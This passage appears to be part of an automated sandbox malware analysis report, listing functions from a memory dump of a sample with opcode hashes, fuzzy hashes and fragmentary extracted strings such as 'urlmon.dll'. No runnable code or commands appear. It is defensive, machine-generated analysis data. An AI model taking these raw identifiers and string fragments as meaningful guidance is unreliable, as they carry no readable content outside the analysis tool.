                                                                                                Function 03B27759 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0860f44986a230bf1dfba74ad460bfbf8ad92d01f365ef2ba2d207f9dc63467
                                                                                                • Instruction ID: a6a12d557d8707aad5eed17c8837c04cb0cdd119d171fe71b58a24fe0246aebf
                                                                                                • Opcode Fuzzy Hash: e0860f44986a230bf1dfba74ad460bfbf8ad92d01f365ef2ba2d207f9dc63467
                                                                                                • Instruction Fuzzy Hash: 8801DEB6C01219AF8B41DFE8C8419EEBBF8BB08204F1446AED915F7240F77156048FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B072E9 Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a6afa3176f9ac32fef5b961329a91422c117f20ac416620a0178f7a727d54e5
                                                                                                • Instruction ID: f6a8c38014019276bd808756b4a8e9b4abac4cbe6e040457fb493dd83d2325fe
                                                                                                • Opcode Fuzzy Hash: 1a6afa3176f9ac32fef5b961329a91422c117f20ac416620a0178f7a727d54e5
                                                                                                • Instruction Fuzzy Hash: 09F0A7B361021667D7109A6DAC41B87FB9CFB85238F240272FE5CCB291EA71F45182E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B23C9A Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06ff6b4daa4f8eb57d5c6e77a70f7491b8a216f17f2a6afa6c6c6ceee8f3a611
                                                                                                • Instruction ID: be8b14fe875232c8cb91c33a4d26fca6d17ee31c5d9187982d20dad9fd414ca7
                                                                                                • Opcode Fuzzy Hash: 06ff6b4daa4f8eb57d5c6e77a70f7491b8a216f17f2a6afa6c6c6ceee8f3a611
                                                                                                • Instruction Fuzzy Hash: 79F054B5B502147BFB10DA94DCC2F7A736CEB85B14F1043E9FA08DE184E6A5B9114662
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1AEA3 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4a8cd8a029a6071badeffb9b1e90a4cacf043993a01c2cb351ea11d010272653
                                                                                                • Instruction ID: 7023287bf72a40fddab8fd41e443825359e9324419bac1fabbdc1f0782167227
                                                                                                • Opcode Fuzzy Hash: 4a8cd8a029a6071badeffb9b1e90a4cacf043993a01c2cb351ea11d010272653
                                                                                                • Instruction Fuzzy Hash: 4CF08965D042547ADB10FBE4EC49E6BB7BCDB48218F4012D4BC0CAA140E5719A9487E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2A999 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 78e7f89a05e49574ed90f8786ef8e3902092087ac3b677da76acc507b031d524
                                                                                                • Instruction ID: d4bb07271062c4d3633909233c963bc141e42d6d6901a6e6ace432cb72c0b0de
                                                                                                • Opcode Fuzzy Hash: 78e7f89a05e49574ed90f8786ef8e3902092087ac3b677da76acc507b031d524
                                                                                                • Instruction Fuzzy Hash: 28F01CBA210208BFDB10EE99DC81E9B7BADEF89710F008519BA18D7241D670B9118BB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B072DD Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9ef1a9b3a84a015e1e30c091fb457d30843e42617eb05b780ac605f26a26fd3a
                                                                                                • Instruction ID: 341b93921a58a567830c54bedd264c414e51c41fa15a6171a6d7686e1369e6e7
                                                                                                • Opcode Fuzzy Hash: 9ef1a9b3a84a015e1e30c091fb457d30843e42617eb05b780ac605f26a26fd3a
                                                                                                • Instruction Fuzzy Hash: DEE022729082572AC7248A7D5C4888AFF88EAC623432903A6E5B997AE1DA306013C7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B689 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction ID: fdcba1357d1f3772c6bb0df303ee3dd021c144953d05d69bc5012e02fc6e3616
                                                                                                • Opcode Fuzzy Hash: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction Fuzzy Hash: AAE06D7A200304BFD610EE59EC44FDF77ACEF89710F004419F908A7241C670BE108AB4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B639 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction ID: ff0ee0c6b784335d2602999af0de30db45f268c00adbcbf202d9500d27083886
                                                                                                • Opcode Fuzzy Hash: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction Fuzzy Hash: 5BE06D76200304BBD610EE99DC40E9F37ACEF89710F00841AF908A7241D631B9108AB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1AE09 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                                                                                                • Instruction ID: b7104e338f7872428c66ff4ad5818731a186fde83bd9635b92eab5fce2cd608f
                                                                                                • Opcode Fuzzy Hash: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                                                                                                • Instruction Fuzzy Hash: 2FF08971C0520CEBDB14DF64D8417DDBB74EF04324F6043AAE814DB280D63497518741
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2D309 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f15db746fe7cbbf7e4db8b2bdab8c5fb991aee1fdecdcb87573cc91431a84757
                                                                                                • Instruction ID: a86caab8ee56dd13d5f65920963ba6ab1498f2f7ec3f37a660465e63a259e182
                                                                                                • Opcode Fuzzy Hash: f15db746fe7cbbf7e4db8b2bdab8c5fb991aee1fdecdcb87573cc91431a84757
                                                                                                • Instruction Fuzzy Hash: 3DE04F36A4023427D6209599DC05FA7BB9CCBC1E64F4902B9FE1C9B280E575A90186E6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B329 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction ID: 98bfce9cd7389aa3277acddf8dd76b2a842bd85dcf57cea71c7e21d0efc1366c
                                                                                                • Opcode Fuzzy Hash: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction Fuzzy Hash: BAE04F39200314BFD520EA5ADC41E9B7BACDBC5714F004556FA48AB241C771B90187F0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1AE06 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fbb84898bff92dfd86c047ef8c70c13500346ffce995256f52f0325c39c8254
                                                                                                • Instruction ID: 879d342fac1213d7e61f39569da2222fd2e699e588d0bbaa44578848bef2871b
                                                                                                • Opcode Fuzzy Hash: 2fbb84898bff92dfd86c047ef8c70c13500346ffce995256f52f0325c39c8254
                                                                                                • Instruction Fuzzy Hash: 92E06D72916108EAEB14DF64E881A9DBBA4EF08310F6087AAE818DB280D635A7648740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2D229 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1d746df88c44fe2257a141521fc980cd23a3bfc8c5eb8ace912914add5f5a92
                                                                                                • Instruction ID: cdfa1180e83757eb8f81608072885958aba4c75356d04a61dfade3ca0deb1d4b
                                                                                                • Opcode Fuzzy Hash: d1d746df88c44fe2257a141521fc980cd23a3bfc8c5eb8ace912914add5f5a92
                                                                                                • Instruction Fuzzy Hash: 50C012755443086BDA40DA98CC49FA533DC9708514F004490BA1C8B281D971B9504655
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 03B0D325 Relevance: 56.4, Strings: 45, Instructions: 187COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$ $""$$$%M$&a$+$1o$1|$3$6O$8$9:$:i$;$<#$=$>$A$B,$Ed$Ek$Eo$H$QD$RA$^$^U$`8$a$d$e$is$k$l$n$p$u$v>$x*$y5${$.$K$K
                                                                                                • API String ID: 0-293768193
                                                                                                • Opcode ID: effd4fc7d1fb7af9dee1fc32b04f4794a183d215ed83d78d2e49a5fe70c7aaf3
                                                                                                • Instruction ID: 8479a3efb7c5a2fde7828ad7fcc9ad5ea525bcbf6143a13e087c411311406485
                                                                                                • Opcode Fuzzy Hash: effd4fc7d1fb7af9dee1fc32b04f4794a183d215ed83d78d2e49a5fe70c7aaf3
                                                                                                • Instruction Fuzzy Hash: EAE10AB0805769CBEB60CF41D99C7DEBBB5BB05308F5081D9C55C3A291CBBA0A89CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1707B Relevance: 51.4, Strings: 41, Instructions: 170COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                • API String ID: 0-3248090998
                                                                                                • Opcode ID: d5373573fe8792b0da498e416914c0105efd3133e49fcc09b7be83893f821279
                                                                                                • Instruction ID: f10008af91410437d31ded93341438ea6a8cc517c9c6fa7ea885f5c8f24c6d92
                                                                                                • Opcode Fuzzy Hash: d5373573fe8792b0da498e416914c0105efd3133e49fcc09b7be83893f821279
                                                                                                • Instruction Fuzzy Hash: 9291F0F08052A98ECB118F55A5603DFBF71BB95204F1581E9C6AA7B243C3BE4E46DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B17089 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                • API String ID: 0-3248090998
                                                                                                • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                • Instruction ID: b6b5c0a3ccec27a69dbc75d51893b105a4198fbc1476e8ac1b776200a1206652
                                                                                                • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                • Instruction Fuzzy Hash: A19100F08052A98ACB118F55A4603DFBF71BB85204F1581E9C6AA7B243C3BE4E46DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B24DC9 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                • API String ID: 0-1002149817
                                                                                                • Opcode ID: 8969fbf0374190e9de5a3ea94b388d0c95566c1358bb98fa74c38c91ed23c5aa
                                                                                                • Instruction ID: f29e82af67ab7cdf722baa76d465994d0e56b16c6dd4cceb07f1654af527fa4d
                                                                                                • Opcode Fuzzy Hash: 8969fbf0374190e9de5a3ea94b388d0c95566c1358bb98fa74c38c91ed23c5aa
                                                                                                • Instruction Fuzzy Hash: A1C11FB5D003689EDB20DFA5DC45BEEBBB8AF45304F0041E9E54CAB241E7B55A88CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B06E9A Relevance: 31.3, Strings: 25, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g{b$"jwl$#fbn$% %4$2?!8$2?!8$6#fb$a wg$a |f$f`a $fln{$gnah$hajk$hj n$j4y2$m<4~$nhj $n{f`$n{f`$wbc#$wbc4${bc$${jw{$~2?!$~2?!
                                                                                                • API String ID: 0-2224445676
                                                                                                • Opcode ID: 6decb2a312256f1c490eb1c3181dd54998a800cd701cde317cd71000d1da2db3
                                                                                                • Instruction ID: 7f653fec4afebd61044adaf91d660eb784bdc18e464452e753a74e1c4e615b05
                                                                                                • Opcode Fuzzy Hash: 6decb2a312256f1c490eb1c3181dd54998a800cd701cde317cd71000d1da2db3
                                                                                                • Instruction Fuzzy Hash: 8431EEB4C15248DBCF24CFDAEA8269DBF35BB04B44F20825CD9502B655D3784A41CF6A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B06EA9 Relevance: 31.3, Strings: 25, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g{b$"jwl$#fbn$% %4$2?!8$2?!8$6#fb$a wg$a |f$f`a $fln{$gnah$hajk$hj n$j4y2$m<4~$nhj $n{f`$n{f`$wbc#$wbc4${bc$${jw{$~2?!$~2?!
                                                                                                • API String ID: 0-2224445676
                                                                                                • Opcode ID: 938230bfd7590506eb71bf7d8ce03d7d6df892c36e80855a3e715288e9a8db13
                                                                                                • Instruction ID: 84f9bf70da8e1fc3d4717e8a217f8cc33261881e6854fb0bc2c247c7bdbca637
                                                                                                • Opcode Fuzzy Hash: 938230bfd7590506eb71bf7d8ce03d7d6df892c36e80855a3e715288e9a8db13
                                                                                                • Instruction Fuzzy Hash: DE21DDB4C15288DACF24CFDAEA8269DBF35FB04B44F20825CD5503B659C3784A41CF6A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B22239 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                • API String ID: 0-3236418099
                                                                                                • Opcode ID: 32ef01ed4aeec600def25e2640ceb4efd60df2924577ec1a92ddbf81a139b734
                                                                                                • Instruction ID: b61a2abf61f260a695c4d83778096c33c484a6f1d973d6f52054ecafa3d449e0
                                                                                                • Opcode Fuzzy Hash: 32ef01ed4aeec600def25e2640ceb4efd60df2924577ec1a92ddbf81a139b734
                                                                                                • Instruction Fuzzy Hash: D99132B5D00328AADB50DB94DC45FEEBB7DAF44704F4442E9E50CAA140EBB55B84CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2222D Relevance: 25.1, Strings: 20, Instructions: 100COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                • API String ID: 0-3236418099
                                                                                                • Opcode ID: 817d04f0a8311a21daa1257c50d298d8ebc937a4b409f288d70286cc70d68d68
                                                                                                • Instruction ID: 791e6159e7d05683202df9431a048c7abb0e0ac8138542127cee1f90d00c4d88
                                                                                                • Opcode Fuzzy Hash: 817d04f0a8311a21daa1257c50d298d8ebc937a4b409f288d70286cc70d68d68
                                                                                                • Instruction Fuzzy Hash: A141FBB4D003289EEB60DFA5C884BDEBBB9BF04708F5042E9951CAA241D7B54B88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1DC19 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                • API String ID: 0-392141074
                                                                                                • Opcode ID: 8f8839db009a5c5c5e0b4d63e5b297a1246051da8522fe4dbb24695c34014762
                                                                                                • Instruction ID: 9738bd9c2ed1be244a2154f31bc03b3a318fbe78d4701211731272f349dfa63a
                                                                                                • Opcode Fuzzy Hash: 8f8839db009a5c5c5e0b4d63e5b297a1246051da8522fe4dbb24695c34014762
                                                                                                • Instruction Fuzzy Hash: A27113B5D10328AADB25DB94CC41FEEB77CBF48704F0442ADE61DAA140EBB567448FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1DC12 Relevance: 16.4, Strings: 13, Instructions: 183COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                • API String ID: 0-392141074
                                                                                                • Opcode ID: 90dc514e2ac2d58cef378df0726c4cd7d1533e08a68a04762b80e2601b85066f
                                                                                                • Instruction ID: 8f2d3d01eb6a9ba28de6e36e2e7d6cbaffd5e85fea083af3681d5b3d3657e150
                                                                                                • Opcode Fuzzy Hash: 90dc514e2ac2d58cef378df0726c4cd7d1533e08a68a04762b80e2601b85066f
                                                                                                • Instruction Fuzzy Hash: 466134B5D10328AADB15DB94CC41FEEBB79BF48704F0442ADE61DAA140EBB157488F91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B18F19 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                • API String ID: 0-2356907671
                                                                                                • Opcode ID: 09633cbac04eb6d5d73697c3a70bdcdf90cd080b8f7a6584b470aca57b2eaf92
                                                                                                • Instruction ID: 2a9863b398046e45f5677e6f1b7a74b5ee238b0bd3717f5bc72c8a6aea222fe0
                                                                                                • Opcode Fuzzy Hash: 09633cbac04eb6d5d73697c3a70bdcdf90cd080b8f7a6584b470aca57b2eaf92
                                                                                                • Instruction Fuzzy Hash: D881B5B5C00328AADB54EBA4CC80FEF777CAF48304F0445EDA51DAA140EA75A758CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B11D59 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                • API String ID: 0-685823316
                                                                                                • Opcode ID: 9f5c0bcded3468ed63f2d7108c03c79d6a183b768ecc149e106bea42360e6d92
                                                                                                • Instruction ID: a0948771214e9db5a4c95e347b058a390ec07ab4e9a4f091f44131d4871d4228
                                                                                                • Opcode Fuzzy Hash: 9f5c0bcded3468ed63f2d7108c03c79d6a183b768ecc149e106bea42360e6d92
